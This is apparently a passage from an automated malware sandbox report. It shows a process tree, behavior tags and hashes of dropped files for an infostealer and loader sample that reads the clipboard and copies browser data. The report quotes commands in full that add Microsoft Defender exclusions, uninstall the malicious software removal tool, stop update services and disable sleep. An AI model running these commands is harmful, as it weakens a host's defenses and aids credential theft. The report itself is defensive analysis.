powershell Get-Clipboard
5⤵
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5080

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:940

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4264

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2640

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4808

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2256

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:784

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4916

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2440

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5084

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2552

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5048

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3496

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1648

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4756

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:560

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1680

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1100

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1308

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:1692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:656

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4120

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2244

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3568

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:2360

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:3268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2820 -ip 2820
1⤵
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4376 -ip 4376
1⤵
PID:4396

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4636

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4952

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5096

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3532

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
2⤵
PID:3408

C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
3⤵
PID:3292

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
2⤵
- Launches sc.exe
PID:5064

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
2⤵
- Launches sc.exe
PID:4876

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
2⤵
- Launches sc.exe
PID:2340

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
2⤵
- Launches sc.exe
PID:3240

C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
2⤵
- Launches sc.exe
PID:1440

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
2⤵
- Power Settings
PID:2128

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
2⤵
- Power Settings
PID:556

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
2⤵
- Power Settings
PID:2892

C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
2⤵
- Power Settings
PID:3012

C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
2⤵
PID:3724

C:\Windows\explorer.exe
explorer.exe
2⤵
- Modifies data under HKEY_USERS
PID:776

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3200

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:4028

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History_tmp
Filesize
152KB

MD5
73bd1e15afb04648c24593e8ba13e983

SHA1
4dd85ca46fcdf9d93f6b324f8bb0b5bb512a1b91

SHA256
aab0b201f392fef9fdff09e56a9d0ac33d0f68be95da270e6dab89bb1f971d8b

SHA512
6eb58fb41691894045569085bd64a83acd62277575ab002cf73d729bda4b6d43c36643a5fa336342e87a493326337ed43b8e5eaeae32f53210714699cb8dfac7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data_tmp
Filesize
100KB

MD5
df95ab0b4975069f0523698fcee83b8e

SHA1
7951baf8445eb50b6ad0f9c9e0a86b0a8d85cef7

SHA256
00b207076648a940ac2156391f3a5ea391317a4bee33722d8cf117f3e9c31c51

SHA512
78baf6b7ffb91ff40c07229a20f46f1069e12452c1e1f3779e002b54da39135a1cc3657e2ccfabc93feffd0e958c61a49901d175ffb2630690171040709a72ff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History_tmp
Filesize
124KB

MD5
9618e15b04a4ddb39ed6c496575f6f95

SHA1
1c28f8750e5555776b3c80b187c5d15a443a7412

SHA256
a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab

SHA512
f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data_tmp
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
9f5483be92b7e603f7df39c777e6c3e1

SHA1
635202149580216db04719f0edb3c0272f86e248

SHA256
7dee886e7131b40658f30f24465b2c08da6a4513c392761c0e6d61775a31e045

SHA512
706b9c5906d5d85720bf18c69c899ef08e08b58c38e0395f90c61eb9c7f8980d08c3be4bb8509ef247974ce369045f57bfb1a17091cca0c7fb3f0f63e3363850

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe
Filesize
297KB

MD5
5d860e52bfa60fec84b6a46661b45246

SHA1
1259e9f868d0d80ac09aadb9387662347cd4bd68

SHA256
b4a1e470f814bbcf1bc26c087eb513f4bab6165c90ecf43ac71dd87702561c30

SHA512
04ea5757d01508a44e0152b3aa78f530908da649d59b8ce7ee3e15c2d4d0314c97f346c1e79b1810edb27165d04781c022937d02536dc9b1dd4c55f023a47701

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe
Filesize
218KB

MD5
d80bb65fe6aa18cc152a957eec8acfaa

SHA1
b7fe6c68644aa5ec7641fa0c15dd9f5a00c9869b

SHA256
5c2ab349bff2012fc64be9e71010c9852250e3b8aa5b71229a6e30e7e1ba8dc2

SHA512
ead0b903092a722606fc08d7e05e210ae6d3003bb4c794ec2dd89164a7369df890c99bded1dcec50fd61059ad7ee96bdaae863a4fa1e1820901f90f0b4d4bb39

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000015001\FirstZ.exe
Filesize
2.5MB

MD5
ffada57f998ed6a72b6ba2f072d2690a

SHA1
6857b5f0c40a1cdb0411eb34aa9fe5029bcdb84f

SHA256
677f393462e24fb6dba1a47b39e674f485450f91deee6076ccbad9fd5e05bd12

SHA512
1de77f83a89935bb3fc3772d5190c3827d76a998785d451e2c0d11a0061cfd28f1b96eccb41b012c76ddda2021e3333a0a647489ae3c6dac10cfb8302abdf33f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
Filesize
522KB

MD5
70a578f7f58456e475facd69469cf20a

SHA1
83e147e7ba01fa074b2f046b65978f838f7b1e8e

SHA256
5c8d556e39269b22e63ba9c941ff306bb043bc35125ba08787617577231b381a

SHA512
707ed48b45978d26faaf3544bf22912461503d6e4b1a077cbb7c3a8abd2f1eb3fec16b2786a79ae4db2dfec92f662ece1998bc142706d2b482599fb6191563c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
Filesize
310KB

MD5
6e3d83935c7a0810f75dfa9badc3f199

SHA1
9f7d7c0ea662bcdca9b0cda928dc339f06ef0730

SHA256
dc4f0a8e3d12c98eac09a42bd976579ccc1851056d9de447495e8be7519760ed

SHA512
9f6b22bc9d0306a69d3c5bab83c7603fa23925c12089f9608772602ab2c4c0908cda2a3d9592fc0fab4aaff209ef41d3e2a931511ce9dfd027691e8dce9ad9b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
Filesize
415KB

MD5
07101cac5b9477ba636cd8ca7b9932cb

SHA1
59ea7fd9ae6ded8c1b7240a4bf9399b4eb3849f1

SHA256
488385cd54d14790b03fa7c7dc997ebea3f7b2a8499e5927eb437a3791102a77

SHA512
02240ff51a74966bc31cfcc901105096eb871f588efaa9be1a829b4ee6f245bd9dca37be7e2946ba6315feea75c3dce5f490847250e62081445cd25b0f406887

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe
Filesize
154KB

MD5
5f331887bec34f51cca7ea78815621f7

SHA1
2eb81490dd3a74aca55e45495fa162b31bcb79e7

SHA256
d7ab2f309ee99f6545c9e1d86166740047965dd8172aec5f0038753c9ff5e9d8

SHA512
7a66c5d043139a3b20814ac65110f8151cf652e3f9d959489781fdaea33e9f53ce9fd1992f1a32bff73380c7d9ef47200d8b924a8adf415e7a93421d62eb054d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000092001\legs.exe
Filesize
659KB

MD5
bbd06263062b2c536b5caacdd5f81b76

SHA1
c38352c1c08fb0fa5e67a079998ef30ebc962089

SHA256
1875275da8d576fd9962c5b2bd9fe0e4b4d188caad9549125c8a64ecaf9308c9

SHA512
7faa4e18cc9d7d82cb8efe8494668e05f75ddd5a8c9c9a058b2246a786a60d7761168862220b70820b02f38f196cfb5f106db36cdcfd5a5a3f9dfd01654eb9ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000094001\taskweaker.exe
Filesize
5.8MB

MD5
6c149b39619395a8ba117a4cae95ba6f

SHA1
3ef8be98589745ecce5522dd871e813f69a7b71b

SHA256
c43b64c78f6ccba5cfb7de13fc39d5cc43fad9a9f5e78799b34100ab69e5e4e8

SHA512
866edae7858e7bfb82486e99b31550307de81fa732a3075b6e2ff0abcade5331be28bb14d894cdf5176dc907a45aaa1407b6d8c4295cc69b6d45516f319560a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000098001\vadimloader.exe
Filesize
9.5MB

MD5
e6e620e5cac01f73d0243dc9cf684193

SHA1
0e2dde6cfd3229273c1f43d9dd9a3ffaa9c1a6e5

SHA256
1064ab9e734628e74c580c5aba71e4660ee3ed68db71f6aa81e30f148a5080fa

SHA512
10881a257630940ee790a4a5b204e235d4a748399f07b40496bd7bfe2b335c3fbd55fe6901626f9a41fc7ecd760124ca9bedb47f8521e7917c48c7db5e49f22c

Download Submit
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
Filesize
1.8MB

MD5
c66ee818a2295aac69baa17df301de34

SHA1
d0a9103fa9505c6409dbf65b144cc9767fdb66b5

SHA256
941b24fd406c17e838ee93bcd2cd74890224154c140f845980287e870ac7f709

SHA512
96d3ffe0dfe5db3f21b19d7e7ed624e5444950d19633a236262fbd7353a4ef999c491505343ea5c7e4d7ac765831c653a52f8294ded05451ba6c330e0c464633

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ins.bat
Filesize
1KB

MD5
0be4cbfa51fe5f8010e78553a28f2779

SHA1
ae21783c148ae1443fa87a43b9b51cb0ab1a799b

SHA256
cc56d197270cdf7c3b5c193ec5b3c63dd87b57b58f90571649f8f0e29a6f1a90

SHA512
337a332eecb12cb065a09b3ae01e86802082c576b203ffd1a8270c69172036dc244ecffad1fba3de76d573c77f1315821a563d2a4aed73bfeb9e9bdf6107edfd

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd
Filesize
82KB

MD5
c7ce973f261f698e3db148ccad057c96

SHA1
59809fd48e8597a73211c5df64c7292c5d120a10

SHA256
02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde

SHA512
a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd
Filesize
121KB

MD5
10fdcf63d1c3c3b7e5861fbb04d64557

SHA1
1aa153efec4f583643046618b60e495b6e03b3d7

SHA256
bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3

SHA512
